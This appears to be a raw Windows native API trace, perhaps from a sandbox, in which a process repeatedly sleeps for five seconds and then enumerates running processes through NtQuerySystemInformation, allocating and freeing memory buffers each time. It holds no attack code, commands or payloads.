NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.994] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.009] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.025] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.041] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.058] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.072] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.089] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.104] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.118] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.133] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.150] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.165] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.190] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.196] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.216] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.231] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.243] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.259] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.275] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.291] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.306] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 